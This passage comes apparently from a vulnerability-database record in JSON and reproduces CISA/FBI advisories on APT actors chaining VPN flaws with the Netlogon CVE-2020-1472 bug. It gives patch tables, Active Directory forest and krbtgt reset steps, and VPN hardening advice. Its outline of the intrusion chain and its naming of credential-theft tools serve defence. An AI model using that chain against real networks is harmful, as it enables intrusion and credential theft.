FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n[Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n * Follow Microsoft\u2019s [guidance](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) on monitoring logs for activity related to the Netlogon vulnerability, CVE-2020-1472.\n * If appropriate for your organization\u2019s network, prevent external communication of all versions of SMB and related protocols at the network boundary by blocking Transmission Control Protocol (TCP) ports 139 and 445 and User Datagram Protocol (UDP) port 137. See the CISA publication on [SMB Security Best Practices](<https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices>) for more information.\n * Implement the prevention, detection, and mitigation strategies outlined in: \n * CISA Alert [TA15-314A \u2013 Compromised Web Servers and Web Shells \u2013 Threat Awareness and Guidance](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A>).\n * National Security Agency Cybersecurity Information Sheet [U/OO/134094-20 \u2013 Detect and Prevent Web Shells Malware](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/>).\n * Isolate external facing services in a network demilitarized zone (DMZ) since they are more exposed to malicious activity; enable robust logging, and monitor the logs for signs of compromise.\n * Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.\n * Implement application controls to only allow execution from specified application directories. System administrators may implement this through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from `PROGRAMFILES`, `PROGRAMFILES(X86)`, and `WINDOWS` folders. All other locations should be disallowed unless an exception is granted.\n * Block Remote Desktop Protocol (RDP) connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.\n\n#### Comprehensive Account Resets\n\nFor accounts where NTLM password hashes or Kerberos tickets may have been compromised (e.g., through CVE-2020-1472), a double-password-reset may be required in order to prevent continued exploitation of those accounts. For domain-admin-level credentials, a reset of KRB-TGT \u201cGolden Tickets\u201d may be required, and Microsoft has released specialized [guidance](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/domain-dominance-alerts>) for this. Such a reset should be performed very carefully if needed.\n\nIf there is an observation of [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through \u201ccreative destruction,\u201d wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premise\u2014as well as in Azure-hosted\u2014AD instances.\n\nNote that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.\n\nIt is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.\n\n 1. Create a temporary administrator account, and use this account only for all administrative actions\n 2. Reset the Kerberos Ticket Granting Ticket `(krbtgt`) password;[[1](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)] this must be completed before any additional actions (a second reset will take place in step 5)\n 3. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned): \n\n 1. User accounts (forced reset with no legacy password reuse)\n 2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])\n 3. Service accounts\n 4. Directory Services Restore Mode (DSRM) account\n 5. Domain Controller machine account\n 6. Application passwords\n 5. Reset the` krbtgt` password again\n 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 7. Reboot domain controllers\n 8. Reboot all endpoints\n\nThe following accounts should be reset:\n\n * AD Kerberos Authentication Master (2x)\n * All Active Directory Accounts\n * All Active Directory Admin Accounts\n * All Active Directory Service Accounts\n * All Active Directory User Accounts\n * DSRM Account on Domain Controllers\n * Non-AD Privileged Application Accounts\n * Non-AD Unprivileged Application Accounts\n * Non-Windows Privileged Accounts\n * Non-Windows User Accounts\n * Windows Computer Accounts\n * Windows Local Admin\n\n#### VPN Vulnerabilities\n\nImplement the following recommendations to secure your organization\u2019s VPNs:\n\n * **Update VPNs, network infrastructure devices, and devices** being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates.\n * **Implement MFA on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.\n\nDiscontinue unused VPN servers. Reduce your organization\u2019s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:\n\n * **Audit **configuration and patch management programs.\n * **Monitor **network traffic for unexpected and unapproved protocols, especially outbound to the Internet (e.g., Secure Shell [SSH], SMB, RDP).\n * **Implement** MFA, especially for privileged accounts.\n * **Use** separate administrative accounts on separate administration workstations.\n * **Keep **[software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\n### Resources\n\n * APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations \u2013 <https://us-cert.cisa.gov/ncas/alerts/aa20-283a>\n * CISA Activity Alert CVE-2019-19781 \u2013 <https://us-cert/cisa.gov/ncas/alerts/aa20-031a>\n * CISA Vulnerability Bulletin \u2013 <https://us-cert/cisa.gov/ncas/bulletins/SB19-161>\n * CISA Current Activity \u2013 <https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688>\n * Citrix Directory Traversal Bug (CVE-2019-19781) \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>\n * Microsoft Exchange remote code execution flaw (CVE-2020-0688) \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2020-0688>\n * CVE-2018-13379 \u2013 [https://nvd.nist.gov/vuln/detail/CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379 >)\n * CVE-2020-1472 \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2020-1472>\n * CVE 2019-10149 \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2019-10149>\n * NCCIC/USCERT Alert TA15-314A \u2013 Compromised Web Servers and Web Shells \u2013 Threat Awareness and Guidance \u2013 [https://us-cert.cisa.gov/ncas/alerts/TA15-314A](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A >)\n * NCCIC/US-CERT publication on SMB Security Best Practices \u2013 <https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices> \n\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)\n\n### Revisions\n\nOctober 22, 2020: Initial Version|November 17, 2020: Added U.S. Heat Map of Activity|December 1, 2020: Added \"current as of\" date to U.S. Heat Map of Activity\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-01T12:00:00", "type": "ics", "title": "Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2020-12-01T12:00:00", "id": "AA20-296A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-296a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:34:11", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n**Note:** the analysis in this joint cybersecurity advisory is ongoing, and the information provided should not be considered comprehensive. The Cybersecurity and Infrastructure Security Agency (CISA) will update this advisory as new information is available.\n\nThis joint cybersecurity advisory was written by CISA with contributions from the Federal Bureau of Investigation (FBI). \n\nCISA has recently observed advanced persistent threat (APT) actors exploiting multiple legacy vulnerabilities in combination with a newer privilege escalation vulnerability\u2014[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\u2014in Windows Netlogon. The commonly used tactic, known as vulnerability chaining, exploits multiple vulnerabilities in the course of a single intrusion to compromise a network or application. \n\nThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks. Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\n\nCISA is aware of some instances where this activity resulted in unauthorized access to elections support systems; however, CISA has no evidence to date that integrity of elections data has been compromised. There are steps that election officials, their supporting SLTT IT staff, and vendors can take to help defend against this malicious cyber activity.\n\nSome common tactics, techniques, and procedures (TTPs) used by APT actors include leveraging legacy network access and virtual private network (VPN) vulnerabilities in association with the recent critical [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon vulnerability. CISA is aware of multiple cases where the Fortinet FortiOS Secure Socket Layer (SSL) VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) has been exploited to gain access to networks. To a lesser extent, CISA has also observed threat actors exploiting the MobileIron vulnerability [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>). While these exploits have been observed recently, this activity is ongoing and still unfolding.\n\nAfter gaining initial access, the actors exploit [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to compromise all Active Directory (AD) identity services. Actors have then been observed using legitimate remote access tools, such as VPN and Remote Desktop Protocol (RDP), to access the environment with the compromised credentials. Observed activity targets multiple sectors and is not limited to SLTT entities.\n\nCISA recommends network staff and administrators review internet-facing infrastructure for these and similar vulnerabilities that have or could be exploited to a similar effect, including Juniper [CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>), Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) (this list is not considered exhaustive).\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Initial Access\n\nAPT threat actors are actively leveraging legacy vulnerabilities in internet-facing infrastructure (_Exploit Public-Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)], _External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to gain initial access into systems. The APT actors appear to have predominately gained initial access via the Fortinet FortiOS VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>).\n\nAlthough not observed in this campaign, other vulnerabilities, listed below, could be used to gain network access (as analysis is evolving, these listed vulnerabilities should not be considered comprehensive). As a best practice, it is critical to patch all known vulnerabilities within internet-facing infrastructure.\n\n * Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * MobileIron [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)\n * Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)\n * F5 BIG-IP [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n#### Fortinet FortiOS SSL VPN CVE-2018-13379\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) is a path traversal vulnerability in the FortiOS SSL VPN web portal. An unauthenticated attacker could exploit this vulnerability to download FortiOS system files through specially crafted HTTP resource requests.[[1](<https://www.fortiguard.com/psirt/FG-IR-18-384>)]\n\n### MobileIron Core &amp; Connector Vulnerability CVE-2020-15505\n\n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) is a remote code execution vulnerability in MobileIron Core &amp; Connector versions 10.3 and earlier.[[2](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)] This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.\n\n### Privilege Escalation\n\nPost initial access, the APT actors use multiple techniques to expand access to the environment. The actors are leveraging [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in Windows Netlogon to escalate privileges and obtain access to Windows AD servers. Actors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]).\n\n#### Microsoft Netlogon Remote Protocol Vulnerability: CVE-2020-1472\n\n[CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) is a vulnerability in Microsoft Windows Netlogon Remote Protocol (MS-NRPC), a core authentication component of Active Directory.[[3](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)] This vulnerability could allow an unauthenticated attacker with network access to a domain controller to completely compromise all AD identity services (_Valid Accounts: Domain Accounts_ [[T1078.002](<https://attack.mitre.org/versions/v7/techniques/T1078/002/>)]). Malicious actors can leverage this vulnerability to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]).\n\n### Persistence\n\nOnce system access has been achieved, the APT actors use abuse of legitimate credentials (_Valid Accounts _[[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]) to log in via VPN or remote access services _(External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to maintain persistence.\n\n### Mitigations\n\nOrganizations with externally facing infrastructure devices that have the vulnerabilities listed in this joint cybersecurity advisory, or other vulnerabilities, should move forward with an \u201cassume breach\u201d mentality. As initial exploitation and escalation may be the only observable exploitation activity, most mitigations will need to focus on more traditional network hygiene and user management activities.\n\n### Keep Systems Up to Date\n\nPatch systems and equipment promptly and diligently. Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. See table 1 for patch information on CVEs mentioned in this report.\n\n_Table 1: Patch information for CVEs_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | \n\n * FortiOS 6.0: 6.0.0 to 6.0.4\n * FortiOS 5.6: 5.6.3 to 5.6.7\n * FortiOS 5.4: 5.4.6 to 5.4.12\n| \n\n * [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 ](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core &amp; Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 \n * Sentry versions 9.7.2 and earlier, and 9.8.0; \n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>) | \n\n * Junos OS 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 15.1X53, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, 20.1\n| \n\n * [Juniper Security Advisory JSA11021](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11021>) \n[CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) | \n\n * PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL)\n| \n\n * [Palo Alto Networks Security Advisory for CVE-2020-2021](<https://security.paloaltonetworks.com/CVE-2020-2021>) \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n### Comprehensive Account Resets\n\nIf there is an observation of [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through \u201ccreative destruction,\u201d wherein as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed on on-premise as well as Azure-hosted AD instances.\n\nNote that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.\n\nIt is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.\n\n 1. Create a temporary administrator account, and use this account only for all administrative actions\n 2. Reset the Kerberos Ticket Granting Ticket (`krbtgt`) password [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)]; this must be completed before any additional actions (a second reset will take place in step 5)\n 3. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)\n 4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned): \n\n 1. User accounts (forced reset with no legacy password reuse)\n 2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])\n 3. Service accounts\n 4. Directory Services Restore Mode (DSRM) account\n 5. Domain Controller machine account\n 6. Application passwords\n 5. Reset the `krbtgt` password again\n 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 7. Reboot domain controllers\n 8. Reboot all endpoints\n\nThe following accounts should be reset:\n\n * AD Kerberos Authentication Master (2x)\n * All Active Directory Accounts\n * All Active Directory Admin Accounts\n * All Active Directory Service Accounts\n * All Active Directory User Accounts\n * DSRM Account on Domain Controllers\n * Non-AD Privileged Application Accounts\n * Non-AD Unprivileged Application Accounts\n * Non-Windows Privileged Accounts\n * Non-Windows User Accounts\n * Windows Computer Accounts\n * Windows Local Admin\n\n### CVE-2020-1472\n\nTo secure your organization\u2019s Netlogon channel connections:\n\n * **Update all Domain Controllers and Read Only Domain Controllers**. On August 11, 2020, Microsoft released [software updates](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to mitigate CVE-2020-1472. Applying this update to domain controllers is currently the only mitigation to this vulnerability (aside from removing affected domain controllers from the network).\n * **Monitor for new events, and address non-compliant devices** that are using vulnerable Netlogon secure channel connections.\n * **Block public access to potentially vulnerable ports**, such as 445 (Server Message Block [SMB]) and 135 (Remote Procedure Call [RPC]).\n\nTo protect your organization against this CVE, follow [advice from Microsoft](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>), including:\n\n * Update your domain controllers with an update released August 11, 2020, or later.\n * Find which devices are making vulnerable connections by monitoring event logs.\n * Address non-compliant devices making vulnerable connections.\n * Enable enforcement mode to address [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in your environment.\n\n### VPN Vulnerabilities\n\nImplement the following recommendations to secure your organization\u2019s VPNs:\n\n * **Update VPNs, network infrastructure devices, and devices **being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates. See table 1 for patch information on VPN-related CVEs mentioned in this report.\n * **Implement multi-factor authentication (MFA) on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.\n\nDiscontinue unused VPN servers. Reduce your organization\u2019s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:\n\n * **Audit **configuration and patch management programs.\n * **Monitor** network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., Secure Shell [SSH], SMB, RDP).\n * **Implement **MFA, especially for privileged accounts.\n * **Use **separate administrative accounts on separate administration workstations.\n * **Keep **[software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available. \n\n### How to uncover and mitigate malicious activity\n\n * **Collect and remove** for further analysis: \n * Relevant artifacts, logs, and data.\n * **Implement **mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.\n * **Consider **soliciting incident response support from a third-party IT security organization to: \n * Provide subject matter expertise and technical support to the incident response.\n * Ensure that the actor is eradicated from the network.\n * Avoid residual issues that could result in follow-up compromises once the incident is closed.\n\n### Resources\n\n * [CISA VPN-Related Guidance](<https://www.cisa.gov/vpn-related-guidance>)\n * CISA Infographic: [Risk Vulnerability And Assessment (RVA) Mapped to the MITRE ATT&amp;CK FRAMEWORK](<https://www.cisa.gov/sites/default/files/publications/Risk and Vulnerability Assessment %28RVA%29 Mapped to the MITRE ATT%26amp%3BCK Framework Infographic_v6-100620_ 508.pdf>)\n * National Security Agency InfoSheet: [Configuring IPsec Virtual Private Networks](<https://media.defense.gov/2020/Jul/02/2002355501/-1/-1/0/CONFIGURING_IPSEC_VIRTUAL_PRIVATE_NETWORKS_2020_07_01_FINAL_RELEASE.PDF>)\n * CISA Joint Advisory: [AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>)\n * CISA Activity Alert: [AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>)\n * CISA Activity Alert: [AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n * CISA Activity Alert: [AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)\n * **Cybersecurity Alerts and Advisories**: Subscriptions to [CISA Alerts](<https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>) and [MS-ISAC Advisories](<https://learn.cisecurity.org/ms-isac-subscription>)\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat.\n\nFor any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:\n\n * CISA (888-282-0870 or [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>)), or\n * The FBI through the FBI Cyber Division (855-292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)) or a [local field office](<https://www.fbi.gov/contact-us/field-offices/field-offices>)\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Fortinet Advisory: FG-IR-18-384 ](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n\n[[2] MobileIron Blog: MobileIron Security Updates 